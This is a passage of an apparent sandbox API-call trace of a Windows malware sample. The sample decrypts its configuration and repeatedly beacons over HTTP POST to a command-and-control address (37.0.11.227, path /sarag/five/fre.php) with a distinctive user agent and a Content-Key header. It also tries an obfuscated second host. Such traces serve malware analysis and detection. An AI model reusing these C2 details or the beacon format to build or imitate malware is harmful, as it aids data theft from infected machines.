hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0272.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.153] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0272.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.154] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0272.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.155] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0272.155] GetProcessHeap () returned 0x690000 [0272.155] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0272.155] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.155] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0272.156] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.156] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0272.157] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.157] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0272.158] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.158] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0272.158] GetProcessHeap () returned 0x690000 [0272.158] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0272.158] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0272.158] GetProcessHeap () returned 0x690000 [0272.158] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0272.158] socket (af=2, type=1, protocol=6) returned 0x838 [0272.160] connect (s=0x838, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0272.183] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0272.183] GetProcessHeap () returned 0x690000 [0272.183] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0272.183] GetProcessHeap () returned 0x690000 [0272.183] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0272.184] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0272.184] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0272.185] GetProcessHeap () returned 0x690000 [0272.185] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0272.185] GetProcessHeap () returned 0x690000 [0272.185] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0272.185] GetProcessHeap () returned 0x690000 [0272.185] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0272.185] GetProcessHeap () returned 0x690000 [0272.186] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0272.186] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0272.187] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0272.187] GetProcessHeap () returned 0x690000 [0272.187] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0272.187] GetProcessHeap () returned 0x690000 [0272.187] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0272.187] send (s=0x838, buf=0x6ad508*, len=242, flags=0) returned 242 [0272.188] send (s=0x838, buf=0x6aba40*, len=159, flags=0) returned 159 [0272.188] GetProcessHeap () returned 0x690000 [0272.188] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0272.188] recv (in: s=0x838, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0272.260] GetProcessHeap () returned 0x690000 [0272.260] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0272.261] GetProcessHeap () returned 0x690000 [0272.261] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0272.261] GetProcessHeap () returned 0x690000 [0272.261] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0272.261] GetProcessHeap () returned 0x690000 [0272.262] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0272.262] closesocket (s=0x838) returned 0 [0272.262] GetProcessHeap () returned 0x690000 [0272.262] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0272.262] GetProcessHeap () returned 0x690000 [0272.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0272.263] GetProcessHeap () returned 0x690000 [0272.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0272.263] GetProcessHeap () returned 0x690000 [0272.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0272.264] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15f0) returned 0x838 [0272.265] Sleep (dwMilliseconds=0xea60) [0272.267] GetProcessHeap () returned 0x690000 [0272.267] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0272.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.268] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0272.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.275] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0272.280] GetProcessHeap () returned 0x690000 [0272.280] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0272.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.283] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0272.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.284] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0272.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.285] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.285] GetProcessHeap () returned 0x690000 [0272.286] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0272.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.287] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0272.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.288] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0272.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.288] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0272.288] GetProcessHeap () returned 0x690000 [0272.288] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0272.289] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.289] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0272.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.290] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0272.291] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.291] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0272.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.292] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0272.292] GetProcessHeap () returned 0x690000 [0272.292] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0272.292] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0272.292] GetProcessHeap () returned 0x690000 [0272.293] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0272.293] GetProcessHeap () returned 0x690000 [0272.294] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0272.294] GetProcessHeap () returned 0x690000 [0272.294] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0272.295] GetProcessHeap () returned 0x690000 [0272.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0272.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.295] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0272.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.300] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0272.323] GetProcessHeap () returned 0x690000 [0272.323] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0272.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.324] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0272.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.325] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0272.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.326] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.326] GetProcessHeap () returned 0x690000 [0272.326] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0272.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.440] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0272.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.599] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0272.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.600] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0272.600] GetProcessHeap () returned 0x690000 [0272.600] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0272.601] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.601] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0272.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.602] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0272.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.604] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0272.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.605] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0272.605] GetProcessHeap () returned 0x690000 [0272.605] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0272.605] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0272.605] GetProcessHeap () returned 0x690000 [0272.605] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0272.605] socket (af=2, type=1, protocol=6) returned 0x83c [0272.605] connect (s=0x83c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0272.751] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0272.751] GetProcessHeap () returned 0x690000 [0272.751] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0272.754] GetProcessHeap () returned 0x690000 [0272.754] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0272.755] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0272.756] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0272.756] GetProcessHeap () returned 0x690000 [0272.756] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0272.756] GetProcessHeap () returned 0x690000 [0272.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0272.768] GetProcessHeap () returned 0x690000 [0272.768] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0272.768] GetProcessHeap () returned 0x690000 [0272.768] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0272.768] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0272.769] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0272.769] GetProcessHeap () returned 0x690000 [0272.769] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0272.769] GetProcessHeap () returned 0x690000 [0272.770] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0272.770] send (s=0x83c, buf=0x6ad508*, len=242, flags=0) returned 242 [0272.771] send (s=0x83c, buf=0x6aba40*, len=159, flags=0) returned 159 [0272.771] GetProcessHeap () returned 0x690000 [0272.771] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0272.771] recv (in: s=0x83c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0272.851] GetProcessHeap () returned 0x690000 [0272.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0272.852] GetProcessHeap () returned 0x690000 [0272.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0272.852] GetProcessHeap () returned 0x690000 [0272.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0272.852] GetProcessHeap () returned 0x690000 [0272.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0272.852] closesocket (s=0x83c) returned 0 [0272.854] GetProcessHeap () returned 0x690000 [0272.854] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0272.854] GetProcessHeap () returned 0x690000 [0272.854] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0272.854] GetProcessHeap () returned 0x690000 [0272.854] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0272.854] GetProcessHeap () returned 0x690000 [0272.854] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0272.855] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15f4) returned 0x83c [0272.857] Sleep (dwMilliseconds=0xea60) [0272.861] GetProcessHeap () returned 0x690000 [0272.861] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0272.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.862] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0272.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.868] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0272.876] GetProcessHeap () returned 0x690000 [0272.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0272.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.877] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0272.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.878] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0272.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.879] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.879] GetProcessHeap () returned 0x690000 [0272.880] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0272.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.881] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0272.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.882] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0272.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.884] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0272.884] GetProcessHeap () returned 0x690000 [0272.884] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0272.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.885] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0272.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.886] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0272.887] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.887] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0272.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.891] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0272.891] GetProcessHeap () returned 0x690000 [0272.891] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0272.891] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0272.892] GetProcessHeap () returned 0x690000 [0272.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0272.892] GetProcessHeap () returned 0x690000 [0272.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0272.893] GetProcessHeap () returned 0x690000 [0272.893] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0272.893] GetProcessHeap () returned 0x690000 [0272.893] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0272.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.894] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0272.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.900] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0272.907] GetProcessHeap () returned 0x690000 [0272.907] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0272.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.908] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0272.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.909] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0272.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.910] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.911] GetProcessHeap () returned 0x690000 [0272.911] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0272.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.912] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0272.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.914] CryptDestroyKey (hKey=0x69d628) returned 1 [0272.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.915] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0272.915] GetProcessHeap () returned 0x690000 [0272.915] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0272.916] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.916] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0272.917] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.917] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0272.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.918] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0272.919] LoadLibraryW 